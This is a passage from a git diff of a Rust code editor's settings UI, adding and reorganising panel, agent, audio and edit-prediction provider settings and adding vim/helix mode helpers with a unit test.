SettingsPage { - fn project_panel_section() -> [SettingsPageItem; 22] { + fn project_panel_section() -> [SettingsPageItem; 28] { [ SettingsPageItem::SectionHeader("Project Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -4516,6 +4729,32 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Horizontal Scroll", + description: "Whether to allow horizontal scrolling in the project panel. When disabled, the view is always locked to the leftmost position and long file names are clipped.", + field: Box::new(SettingField { + json_path: Some("project_panel.scrollbar.horizontal_scroll"), + pick: |settings_content| { + settings_content + .project_panel + .as_ref()? + .scrollbar + .as_ref()? + .horizontal_scroll + .as_ref() + }, + write: |settings_content, value| { + settings_content + .project_panel + .get_or_insert_default() + .scrollbar + .get_or_insert_default() + .horizontal_scroll = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Show Diagnostics", description: "Which files containing diagnostic errors/warnings to mark in the project panel.", @@ -4560,6 +4799,28 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Git Status Indicator", + description: "Show a git status indicator next to file names in the project panel.", + field: Box::new(SettingField { + json_path: Some("project_panel.git_status_indicator"), + pick: |settings_content| { + settings_content + .project_panel + .as_ref()? + .git_status_indicator + .as_ref() + }, + write: |settings_content, value| { + settings_content + .project_panel + .get_or_insert_default() + .git_status_indicator = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Sticky Scroll", description: "Whether to stick parent directories at top of the project panel.", @@ -4634,7 +4895,7 @@ fn panels_page() -> SettingsPage { title: "Hide Root", description: "Whether to hide the root entry when only one folder is open in the window.", field: Box::new(SettingField { - json_path: Some("project_panel.drag_and_drop"), + json_path: Some("project_panel.hide_root"), pick: |settings_content| { settings_content.project_panel.as_ref()?.hide_root.as_ref() }, @@ -4671,31 +4932,25 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "Hidden Files", - description: "Globs to match files that will be considered \"hidden\" and can be hidden from the project panel.", - field: Box::new( - SettingField { - json_path: Some("worktree.hidden_files"), - pick: |settings_content| { - settings_content.project.worktree.hidden_files.as_ref() - }, - write: |settings_content, value| { - settings_content.project.worktree.hidden_files = value; - }, - } - .unimplemented(), - ), + title: "Sort Mode", + description: "Sort order for entries in the project panel.", + field: Box::new(SettingField { + json_path: Some("project_panel.sort_mode"), + pick: |settings_content| { + settings_content.project_panel.as_ref()?.sort_mode.as_ref() + }, + write: |settings_content, value| { + settings_content + .project_panel + .get_or_insert_default() + .sort_mode = value; + }, + }), metadata: None, files: USER, }), - ] - } - - fn auto_open_files_section() -> [SettingsPageItem; 5] { - [ - SettingsPageItem::SectionHeader("Auto Open Files"), SettingsPageItem::SettingItem(SettingItem { - title: "On Create", + title: "Auto Open Files On Create", description: "Whether to automatically open newly created files in the editor.", field: Box::new(SettingField { json_path: Some("project_panel.auto_open.on_create"), @@ -4721,7 +4976,7 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "On Paste", + title: "Auto Open Files On Paste", description: "Whether to automatically open files after pasting or duplicating them.", field: Box::new(SettingField { json_path: Some("project_panel.auto_open.on_paste"), @@ -4747,7 +5002,7 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "On Drop", + title: "Auto Open Files On Drop", description: "Whether to automatically open files dropped from external sources.", field: Box::new(SettingField { json_path: Some("project_panel.auto_open.on_drop"), @@ -4773,27 +5028,27 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "Sort Mode", - description: "Sort order for entries in the project panel.", - field: Box::new(SettingField { - pick: |settings_content| { - settings_content.project_panel.as_ref()?.sort_mode.as_ref() - }, - write: |settings_content, value| { - settings_content - .project_panel - .get_or_insert_default() - .sort_mode = value; - }, - json_path: Some("project_panel.sort_mode"), - }), + title: "Hidden Files", + description: "Globs to match files that will be considered \"hidden\" and can be hidden from the project panel.", + field: Box::new( + SettingField { + json_path: Some("worktree.hidden_files"), + pick: |settings_content| { + settings_content.project.worktree.hidden_files.as_ref() + }, + write: |settings_content, value| { + settings_content.project.worktree.hidden_files = value; + }, + } + .unimplemented(), + ), metadata: None, files: USER, }), ] } - fn terminal_panel_section() -> [SettingsPageItem; 2] { + fn terminal_panel_section() -> [SettingsPageItem; 4] { [ SettingsPageItem::SectionHeader("Terminal Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -4809,6 +5064,41 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Terminal Panel Flexible Sizing", + description: "Whether the terminal panel should use flexible (proportional) sizing when docked to the left or right.", + field: Box::new(SettingField { + json_path: Some("terminal.flexible"), + pick: |settings_content| settings_content.terminal.as_ref()?.flexible.as_ref(), + write: |settings_content, value| { + settings_content.terminal.get_or_insert_default().flexible = value; + }, + }), + metadata: None, + files: USER, + }), + SettingsPageItem::SettingItem(SettingItem { + title: "Show Count Badge", + description: "Show a badge on the terminal panel icon with the count of open terminals.", + field: Box::new(SettingField { + json_path: Some("terminal.show_count_badge"), + pick: |settings_content| { + settings_content + .terminal + .as_ref()? + .show_count_badge + .as_ref() + }, + write: |settings_content, value| { + settings_content + .terminal + .get_or_insert_default() + .show_count_badge = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -5021,7 +5311,7 @@ fn panels_page() -> SettingsPage { ] } - fn git_panel_section() -> [SettingsPageItem; 11] { + fn git_panel_section() -> [SettingsPageItem; 14] { [ SettingsPageItem::SectionHeader("Git Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -5163,6 +5453,42 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "File Icons", + description: "Show file icons next to the Git status icon.", + field: Box::new(SettingField { + json_path: Some("git_panel.file_icons"), + pick: |settings_content| { + settings_content.git_panel.as_ref()?.file_icons.as_ref() + }, + write: |settings_content, value| { + settings_content + .git_panel + .get_or_insert_default() + .file_icons = value; + }, + }), + metadata: None, + files: USER, + }), + SettingsPageItem::SettingItem(SettingItem { + title: "Folder Icons", + description: "Whether to show folder icons or chevrons for directories in the git panel.", + field: Box::new(SettingField { + json_path: Some("git_panel.folder_icons"), + pick: |settings_content| { + settings_content.git_panel.as_ref()?.folder_icons.as_ref() + }, + write: |settings_content, value| { + settings_content + .git_panel + .get_or_insert_default() + .folder_icons = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Diff Stats", description: "Whether to show the addition/deletion change count next to each file in the Git panel.", @@ -5181,6 +5507,28 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Show Count Badge", + description: "Whether to show a badge on the git panel icon with the count of uncommitted changes.", + field: Box::new(SettingField { + json_path: Some("git_panel.show_count_badge"), + pick: |settings_content| { + settings_content + .git_panel + .as_ref()? + .show_count_badge + .as_ref() + }, + write: |settings_content, value| { + settings_content + .git_panel + .get_or_insert_default() + .show_count_badge = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Scroll Bar", description: "How and when the scrollbar should be displayed.", @@ -5231,7 +5579,7 @@ fn panels_page() -> SettingsPage { ] } - fn notification_panel_section() -> [SettingsPageItem; 4] { + fn notification_panel_section() -> [SettingsPageItem; 5] { [ SettingsPageItem::SectionHeader("Notification Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -5296,6 +5644,28 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Show Count Badge", + description: "Show a badge on the notification panel icon with the count of unread notifications.", + field: Box::new(SettingField { + json_path: Some("notification_panel.show_count_badge"), + pick: |settings_content| { + settings_content + .notification_panel + .as_ref()? + .show_count_badge + .as_ref() + }, + write: |settings_content, value| { + settings_content + .notification_panel + .get_or_insert_default() + .show_count_badge = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -5367,7 +5737,7 @@ fn panels_page() -> SettingsPage { ] } - fn agent_panel_section() -> [SettingsPageItem; 5] { + fn agent_panel_section() -> [SettingsPageItem; 6] { [ SettingsPageItem::SectionHeader("Agent Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -5396,6 +5766,19 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Agent Panel Flexible Sizing", + description: "Whether the agent panel should use flexible (proportional) sizing when docked to the left or right.", + field: Box::new(SettingField { + json_path: Some("agent.flexible"), + pick: |settings_content| settings_content.agent.as_ref()?.flexible.as_ref(), + write: |settings_content, value| { + settings_content.agent.get_or_insert_default().flexible = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Agent Panel Default Width", description: "Default width when the agent panel is docked to the left or right.", @@ -5436,7 +5819,6 @@ fn panels_page() -> SettingsPage { title: "Panels", items: concat_sections![ project_panel_section(), - auto_open_files_section(), terminal_panel_section(), outline_panel_section(), git_panel_section(), @@ -6793,101 +7175,8 @@ fn collaboration_page() -> SettingsPage { ] } - fn experimental_section() -> [SettingsPageItem; 9] { + fn audio_settings() -> [SettingsPageItem; 3] { [ - SettingsPageItem::SectionHeader("Experimental"), - SettingsPageItem::SettingItem(SettingItem { - title: "Rodio Audio", - description: "Opt into the new audio system.", - field: Box::new(SettingField { - json_path: Some("audio.experimental.rodio_audio"), - pick: |settings_content| settings_content.audio.as_ref()?.rodio_audio.as_ref(), - write: |settings_content, value| { - settings_content.audio.get_or_insert_default().rodio_audio = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Auto Microphone Volume", - description: "Automatically adjust microphone volume (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.auto_microphone_volume"), - pick: |settings_content| { - settings_content - .audio - .as_ref()? - .auto_microphone_volume - .as_ref() - }, - write: |settings_content, value| { - settings_content - .audio - .get_or_insert_default() - .auto_microphone_volume = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Auto Speaker Volume", - description: "Automatically adjust volume of other call members (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.auto_speaker_volume"), - pick: |settings_content| { - settings_content - .audio - .as_ref()? - .auto_speaker_volume - .as_ref() - }, - write: |settings_content, value| { - settings_content - .audio - .get_or_insert_default() - .auto_speaker_volume = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Denoise", - description: "Remove background noises (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.denoise"), - pick: |settings_content| settings_content.audio.as_ref()?.denoise.as_ref(), - write: |settings_content, value| { - settings_content.audio.get_or_insert_default().denoise = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Legacy Audio Compatible", - description: "Use audio parameters compatible with previous versions (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.legacy_audio_compatible"), - pick: |settings_content| { - settings_content - .audio - .as_ref()? - .legacy_audio_compatible - .as_ref() - }, - write: |settings_content, value| { - settings_content - .audio - .get_or_insert_default() - .legacy_audio_compatible = value; - }, - }), - metadata: None, - files: USER, - }), SettingsPageItem::ActionLink(ActionLink { title: "Test Audio".into(), description: Some("Test your microphone and speaker setup".into()), @@ -6948,11 +7237,11 @@ fn collaboration_page() -> SettingsPage { SettingsPage { title: "Collaboration", - items: concat_sections![calls_section(), experimental_section()], + items: concat_sections![calls_section(), audio_settings()], } } -fn ai_page() -> SettingsPage { +fn ai_page(cx: &App) -> SettingsPage { fn general_section() -> [SettingsPageItem; 2] { [ SettingsPageItem::SectionHeader("General"), @@ -6972,8 +7261,8 @@ fn ai_page() -> SettingsPage { ] } - fn agent_configuration_section() -> [SettingsPageItem; 12] { - [ + fn agent_configuration_section(cx: &App) -> Box<[SettingsPageItem]> { + let mut items = vec![ SettingsPageItem::SectionHeader("Agent Configuration"), SettingsPageItem::SubPageLink(SubPageLink { title: "Tool Permissions".into(), @@ -6984,6 +7273,34 @@ fn ai_page() -> SettingsPage { files: USER, render: render_tool_permissions_setup_page, }), + ]; + + if cx.has_flag::() { + items.push(SettingsPageItem::SettingItem(SettingItem { + title: "New Thread Location", + description: "Whether to start a new thread in the current local project or in a new Git worktree.", + field: Box::new(SettingField { + json_path: Some("agent.new_thread_location"), + pick: |settings_content| { + settings_content + .agent + .as_ref()? + .new_thread_location + .as_ref() + }, + write: |settings_content, value| { + settings_content + .agent + .get_or_insert_default() + .new_thread_location = value; + }, + }), + metadata: None, + files: USER, + })); + } + + items.extend([ SettingsPageItem::SettingItem(SettingItem { title: "Single File Review", description: "When enabled, agent edits will also be displayed in single-file buffers for review.", @@ -7044,7 +7361,7 @@ fn ai_page() -> SettingsPage { }), SettingsPageItem::SettingItem(SettingItem { title: "Play Sound When Agent Done", - description: "Whether to play a sound when the agent has either completed its response, or needs user input.", + description: "When to play a sound when the agent has either completed its response, or needs user input.", field: Box::new(SettingField { json_path: Some("agent.play_sound_when_agent_done"), pick: |settings_content| { @@ -7104,6 +7421,28 @@ fn ai_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Thinking Display", + description: "How thinking blocks should be displayed by default. 'Auto' fully expands during streaming, then auto-collapses when done. 'Preview' auto-expands with a height constraint during streaming. 'Always Expanded' shows full content. 'Always Collapsed' keeps them collapsed.", + field: Box::new(SettingField { + json_path: Some("agent.thinking_display"), + pick: |settings_content| { + settings_content + .agent + .as_ref()? + .thinking_display + .as_ref() + }, + write: |settings_content, value| { + settings_content + .agent + .get_or_insert_default() + .thinking_display = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Cancel Generation On Terminal Stop", description: "Whether clicking the stop button on a running terminal tool should also cancel the agent's generation. Note that this only applies to the stop button, not to ctrl+c inside the terminal.", @@ -7188,7 +7527,27 @@ fn ai_page() -> SettingsPage { metadata: None, files: USER, }), - ] + SettingsPageItem::SettingItem(SettingItem { + title: "Show Merge Conflict Indicator", + description: "Whether to show the merge conflict indicator in the status bar that offers to resolve conflicts using the agent.", + field: Box::new(SettingField { + json_path: Some("agent.show_merge_conflict_indicator"), + pick: |settings_content| { + settings_content.agent.as_ref()?.show_merge_conflict_indicator.as_ref() + }, + write: |settings_content, value| { + settings_content + .agent + .get_or_insert_default() + .show_merge_conflict_indicator = value; + }, + }), + metadata: None, + files: USER, + }), + ]); + + items.into_boxed_slice() } fn context_servers_section() -> [SettingsPageItem; 2] { @@ -7212,68 +7571,40 @@ fn ai_page() -> SettingsPage { ] } - fn edit_prediction_display_sub_section() -> [SettingsPageItem; 2] { - [ - SettingsPageItem::SettingItem(SettingItem { - title: "Display Mode", - description: "When to show edit predictions previews in buffer. The eager mode displays them inline, while the subtle mode displays them only when holding a modifier key.", - field: Box::new(SettingField { - json_path: Some("edit_prediction.display_mode"), - pick: |settings_content| { - settings_content - .project - .all_languages - .edit_predictions - .as_ref()? - .mode - .as_ref() - }, - write: |settings_content, value| { - settings_content - .project - .all_languages - .edit_predictions - .get_or_insert_default() - .mode = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Display In Text Threads", - description: "Whether edit predictions are enabled when editing text threads in the agent panel.", - field: Box::new(SettingField { - json_path: Some("edit_prediction.in_text_threads"), - pick: |settings_content| { - settings_content - .project - .all_languages - .edit_predictions - .as_ref()? - .enabled_in_text_threads - .as_ref() - }, - write: |settings_content, value| { - settings_content - .project - .all_languages - .edit_predictions - .get_or_insert_default() - .enabled_in_text_threads = value; - }, - }), - metadata: None, - files: USER, + fn edit_prediction_display_sub_section() -> [SettingsPageItem; 1] { + [SettingsPageItem::SettingItem(SettingItem { + title: "Display Mode", + description: "When to show edit predictions previews in buffer. The eager mode displays them inline, while the subtle mode displays them only when holding a modifier key.", + field: Box::new(SettingField { + json_path: Some("edit_prediction.display_mode"), + pick: |settings_content| { + settings_content + .project + .all_languages + .edit_predictions + .as_ref()? + .mode + .as_ref() + }, + write: |settings_content, value| { + settings_content + .project + .all_languages + .edit_predictions + .get_or_insert_default() + .mode = value; + }, }), - ] + metadata: None, + files: USER, + })] } SettingsPage { title: "AI", items: concat_sections![ general_section(), - agent_configuration_section(), + agent_configuration_section(cx), context_servers_section(), edit_prediction_language_settings_section(), edit_prediction_display_sub_section() @@ -7405,7 +7736,7 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { }), SettingsPageItem::SettingItem(SettingItem { title: "Auto Indent", - description: "Whether indentation should be adjusted based on the context whilst typing.", + description: "Controls automatic indentation behavior when typing.", field: Box::new(SettingField { json_path: Some("languages.$(language).auto_indent"), pick: |settings_content| { @@ -8367,7 +8698,7 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { ] } - fn miscellaneous_section() -> [SettingsPageItem; 6] { + fn miscellaneous_section() -> [SettingsPageItem; 7] { [ SettingsPageItem::SectionHeader("Miscellaneous"), SettingsPageItem::SettingItem(SettingItem { @@ -8466,6 +8797,19 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { metadata: None, files: USER | PROJECT, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Vim/Emacs Modeline Support", + description: "Number of lines to search for modelines (set to 0 to disable).", + field: Box::new(SettingField { + json_path: Some("modeline_lines"), + pick: |settings_content| settings_content.modeline_lines.as_ref(), + write: |settings_content, value| { + settings_content.modeline_lines = value; + }, + }), + metadata: None, + files: USER | PROJECT, + }), ] } @@ -9012,3 +9356,67 @@ where { <::Discriminant as strum::VariantArray>::VARIANTS } + +/// Updates the `vim_mode` setting, disabling `helix_mode` if present and +/// `vim_mode` is being enabled. +fn write_vim_mode(settings: &mut SettingsContent, value: Option) { + if value == Some(true) && settings.helix_mode == Some(true) { + settings.helix_mode = Some(false); + } + settings.vim_mode = value; +} + +/// Updates the `helix_mode` setting, disabling `vim_mode` if present and +/// `helix_mode` is being enabled. +fn write_helix_mode(settings: &mut SettingsContent, value: Option) { + if value == Some(true) && settings.vim_mode == Some(true) { + settings.vim_mode = Some(false); + } + settings.helix_mode = value; +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_write_vim_helix_mode() { + // Enabling vim mode while `vim_mode` and `helix_mode` are not yet set + // should only update the `vim_mode` setting. + let mut settings = SettingsContent::default(); + write_vim_mode(&mut settings, Some(true)); + assert_eq!(settings.vim_mode, Some(true)); + assert_eq!(settings.helix_mode, None); + + // Enabling helix mode while `vim_mode` and `helix_mode` are not yet set + // should only update the `helix_mode` setting. + let mut settings = SettingsContent::default(); + write_helix_mode(&mut settings, Some(true)); + assert_eq!(settings.helix_mode, Some(true)); + assert_eq!(settings.vim_mode, None); + + // Disabling helix mode should only touch `helix_mode` setting when + // `vim_mode` is not set. + write_helix_mode(&mut settings, Some(false)); + assert_eq!(settings.helix_mode, Some(false)); + assert_eq!(settings.vim_mode, None); + + // Enabling vim mode should update `vim_mode` but leave `helix_mode` + // untouched. + write_vim_mode(&mut settings, Some(true)); + assert_eq!(settings.vim_mode, Some(true)); + assert_eq!(settings.helix_mode, Some(false)); + + // Enabling helix mode should update `helix_mode` and disable + // `vim_mode`. + write_helix_mode(&mut settings, Some(true)); + assert_eq!(settings.helix_mode, Some(true)); + assert_eq!(settings.vim_mode, Some(false)); + + // Enabling vim mode should update `vim_mode` and disable + // `helix_mode`. + write_vim_mode(&mut settings, Some(true)); + assert_eq!(settings.vim_mode, Some(true)); + assert_eq!(settings.helix_mode, Some(false)); + } +} diff --git a/crates/settings_ui/src/pages/audio_test_window.rs b/crates/settings_ui/src/pages/audio_test_window.rs index 63bd1d14ffb3ad9c7d1b2d176d9de58aa762ec25..d50d017d7abde836fb2945baf2f1434472281005 100644 --- a/crates/settings_ui/src/pages/audio_test_window.rs +++ b/crates/settings_ui/src/pages/audio_test_window.rs @@ -88,7 +88,7 @@ fn start_test_playback( } }; - let Ok(output) = audio::open_output_stream(output_device_id) else { + let Ok(output) = audio::open_test_output(output_device_id) else { log::error!("Could not open output device for audio test"); return; }; diff --git a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs index 338fe4de14f1f7e9060fafe865253f09f0bdc481..a2a457d33eb0788ff0bed981ce5666423890f05a 100644 --- a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs +++ b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs @@ -2,7 +2,7 @@ use codestral::{CODESTRAL_API_URL, codestral_api_key_state, codestral_api_url}; use edit_prediction::{ ApiKeyState, mercury::{MERCURY_CREDENTIALS_URL, mercury_api_token}, - sweep_ai::{SWEEP_CREDENTIALS_URL, sweep_api_token}, + open_ai_compatible::{open_ai_compatible_api_token, open_ai_compatible_api_url}, }; use edit_prediction_ui::{get_available_providers, set_completion_provider}; use gpui::{Entity, ScrollHandle, prelude::*}; @@ -33,7 +33,9 @@ pub(crate) fn render_edit_prediction_setup_page( render_api_key_provider( IconName::Inception, "Mercury", - "https://platform.inceptionlabs.ai/dashboard/api-keys".into(), + ApiKeyDocs::Link { + dashboard_url: "https://platform.inceptionlabs.ai/dashboard/api-keys".into(), + }, mercury_api_token(cx), |_cx| MERCURY_CREDENTIALS_URL, None, @@ -44,15 +46,17 @@ pub(crate) fn render_edit_prediction_setup_page( ), Some( render_api_key_provider( - IconName::SweepAi, - "Sweep", - "https://app.sweep.dev/".into(), - sweep_api_token(cx), - |_cx| SWEEP_CREDENTIALS_URL, + IconName::AiMistral, + "Codestral", + ApiKeyDocs::Link { + dashboard_url: "https://console.mistral.ai/codestral".into(), + }, + codestral_api_key_state(cx), + |cx| codestral_api_url(cx), Some( settings_window .render_sub_page_items_section( - sweep_settings().iter().enumerate(), + codestral_settings().iter().enumerate(), true, window, cx, @@ -64,17 +68,20 @@ pub(crate) fn render_edit_prediction_setup_page( ) .into_any_element(), ), + Some(render_ollama_provider(settings_window, window, cx).into_any_element()), Some( render_api_key_provider( - IconName::AiMistral, - "Codestral", - "https://console.mistral.ai/codestral".into(), - codestral_api_key_state(cx), - |cx| codestral_api_url(cx), + IconName::AiOpenAiCompat, + "OpenAI Compatible API", + ApiKeyDocs::Custom { + message: "The API key sent as Authorization: Bearer {key}.".into(), + }, + open_ai_compatible_api_token(cx), + |cx| open_ai_compatible_api_url(cx), Some( settings_window .render_sub_page_items_section( - codestral_settings().iter().enumerate(), + open_ai_compatible_settings().iter().enumerate(), true, window, cx, @@ -86,8 +93,6 @@ pub(crate) fn render_edit_prediction_setup_page( ) .into_any_element(), ), - Some(render_ollama_provider(settings_window, window, cx).into_any_element()), - Some(render_open_ai_compatible_provider(settings_window, window, cx).into_any_element()), ]; div() @@ -141,10 +146,12 @@ fn render_provider_dropdown(window: &mut Window, cx: &mut App) -> AnyElement { h_flex() .pt_2p5() .w_full() + .min_w_0() .justify_between() .child( v_flex() .w_full() + .min_w_0() .max_w_1_2() .child(Label::new("Provider")) .child( @@ -162,10 +169,15 @@ fn render_provider_dropdown(window: &mut Window, cx: &mut App) -> AnyElement { .into_any_element() } +enum ApiKeyDocs { + Link { dashboard_url: SharedString }, + Custom { message: SharedString }, +} + fn render_api_key_provider( icon: IconName, title: &'static str, - link: SharedString, + docs: ApiKeyDocs, api_key_state: Entity, current_url: fn(&mut App) -> SharedString, additional_fields: Option, @@ -173,9 +185,15 @@ fn render_api_key_provider( cx: &mut Context, ) -> impl IntoElement { let weak_page = cx.weak_entity(); + let credentials_provider = zed_credentials_provider::global(cx); _ = window.use_keyed_state(current_url(cx), cx, |_, cx| { let task = api_key_state.update(cx, |key_state, cx| { - key_state.load_if_needed(current_url(cx), |state| state, cx) + key_state.load_if_needed( + current_url(cx), + |state| state, + credentials_provider.clone(), + cx, + ) }); cx.spawn(async move |_, cx| { task.await.ok(); @@ -196,10 +214,17 @@ fn render_api_key_provider( }); let write_key = move |api_key: Option, cx: &mut App| { + let credentials_provider = zed_credentials_provider::global(cx); api_key_state .update(cx, |key_state, cx| { let url = current_url(cx); - key_state.store(url, api_key, |key_state| key_state, cx) + key_state.store( + url, + api_key, + |key_state| key_state, + credentials_provider, + cx, + ) }) .detach_and_log_err(cx); }; @@ -209,25 +234,34 @@ fn render_api_key_provider( .icon(icon) .no_padding(true); let button_link_label = format!("{} dashboard", title); - let description = h_flex() - .min_w_0() - .gap_0p5() - .child( - Label::new("Visit the") - .size(LabelSize::Small) - .color(Color::Muted), - ) - .child( - ButtonLink::new(button_link_label, link) - .no_icon(true) - .label_size(LabelSize::Small) - .label_color(Color::Muted), - ) - .child( - Label::new("to generate an API key.") + let description = match docs { + ApiKeyDocs::Custom { message } => div().min_w_0().w_full().child( + Label::new(message) .size(LabelSize::Small) .color(Color::Muted), - ); + ), + ApiKeyDocs::Link { dashboard_url } => h_flex() + .w_full() + .min_w_0() + .flex_wrap() + .gap_0p5() + .child( + Label::new("Visit the") + .size(LabelSize::Small) + .color(Color::Muted), + ) + .child( + ButtonLink::new(button_link_label, dashboard_url) + .no_icon(true) + .label_size(LabelSize::Small) + .label_color(Color::Muted), + ) + .child( + Label::new("to generate an API key.") + .size(LabelSize::Small) + .color(Color::Muted), + ), + }; let configured_card_label = if is_from_env_var { "API Key Set in Environment Variable" } else { @@ -257,10 +291,12 @@ fn render_api_key_provider( h_flex() .pt_2p5() .w_full() + .min_w_0() .justify_between() .child( v_flex() .w_full() + .min_w_0() .max_w_1_2() .child(Label::new("API Key")) .child(description) @@ -297,39 +333,6 @@ fn render_api_key_provider( }) } -fn sweep_settings() -> Box<[SettingsPageItem]> { - Box::new([SettingsPageItem::SettingItem(SettingItem { - title: "Privacy Mode", - description: "When enabled, Sweep will not store edit prediction inputs or outputs. When disabled, Sweep may collect data including buffer contents, diagnostics, file paths, and generated predictions to improve the service.", - field: Box::new(SettingField { - pick: |settings| { - settings - .project - .all_languages - .edit_predictions - .as_ref()? - .sweep - .as_ref()? - .privacy_mode - .as_ref() - }, - write: |settings, value| { - settings - .project - .all_languages - .edit_predictions - .get_or_insert_default() - .sweep - .get_or_insert_default() - .privacy_mode = value; - }, - json_path: Some("edit_predictions.sweep.privacy_mode"), - }), - metadata: None, - files: USER, - })]) -} - fn render_ollama_provider( settings_window: &SettingsWindow, window: &mut Window, @@ -423,7 +426,7 @@ fn ollama_settings() -> Box<[SettingsPageItem]> { }), SettingsPageItem::SettingItem(SettingItem { title: "Prompt Format", - description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name", + description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name.", field: Box::new(SettingField { pick: |settings| { settings @@ -484,34 +487,6 @@ fn ollama_settings() -> Box<[SettingsPageItem]> { ]) } -fn render_open_ai_compatible_provider( - settings_window: &SettingsWindow, - window: &mut Window, - cx: &mut Context, -) -> impl IntoElement { - let open_ai_compatible_settings = open_ai_compatible_settings(); - let additional_fields = settings_window - .render_sub_page_items_section( - open_ai_compatible_settings.iter().enumerate(), - true, - window, - cx, - ) - .into_any_element(); - - v_flex() - .id("open-ai-compatible") - .min_w_0() - .pt_8() - .gap_1p5() - .child( - SettingsSectionHeader::new("OpenAI Compatible API") - .icon(IconName::AiOpenAiCompat) - .no_padding(true), - ) - .child(div().px_neg_8().child(additional_fields)) -} - fn open_ai_compatible_settings() -> Box<[SettingsPageItem]> { Box::new([ SettingsPageItem::SettingItem(SettingItem { @@ -582,7 +557,7 @@ fn open_ai_compatible_settings() -> Box<[SettingsPageItem]> { }), SettingsPageItem::SettingItem(SettingItem { title: "Prompt Format", - description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name", + description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name.", field: Box::new(SettingField { pick: |settings| { settings @@ -748,12 +723,9 @@ fn render_github_copilot_provider(window: &mut Window, cx: &mut App) -> Option AnyEl h_flex() .my_4() + .min_w_0() .justify_between() .child( v_flex() + .w_full() + .min_w_0() .child(Label::new("Default Permission")) .child( Label::new( @@ -1090,9 +1097,7 @@ fn render_global_default_mode_section(current_mode: ToolPermissionMode) -> AnyEl .tab_index(0_isize) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(IconName::ChevronDown) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small), + .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)), ) .menu(move |window, cx| { Some(ContextMenu::build(window, cx, move |menu, _, _| { @@ -1126,13 +1131,18 @@ fn render_default_mode_section( let tool_id_owned = tool_id.to_string(); h_flex() + .min_w_0() .justify_between() .child( - v_flex().child(Label::new("Default Action")).child( - Label::new("Action to take when no patterns match.") - .size(LabelSize::Small) - .color(Color::Muted), - ), + v_flex() + .w_full() + .min_w_0() + .child(Label::new("Default Action")) + .child( + Label::new("Action to take when no patterns match.") + .size(LabelSize::Small) + .color(Color::Muted), + ), ) .child( PopoverMenu::new(format!("default-mode-{}", tool_id)) @@ -1141,9 +1151,7 @@ fn render_default_mode_section( .tab_index(0_isize) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(IconName::ChevronDown) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small), + .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)), ) .menu(move |window, cx| { let tool_id = tool_id_owned.clone(); @@ -1413,6 +1421,9 @@ mod tests { // Subagent permission checks happen at the level of individual // tool calls within the subagent, not at the spawning level. "spawn_agent", + 